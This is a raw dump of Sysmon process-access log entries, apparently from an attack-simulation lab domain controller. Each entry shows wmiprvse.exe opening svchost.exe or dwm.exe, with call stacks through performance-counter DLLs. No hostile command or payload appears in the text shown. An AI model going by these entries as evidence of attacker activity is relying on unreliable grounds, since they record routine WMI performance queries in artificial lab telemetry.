13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004983Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004982Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004981Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004980Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004979Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004978Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004977Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004976Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004975Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004974Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004973Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004972Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004971Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004970Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 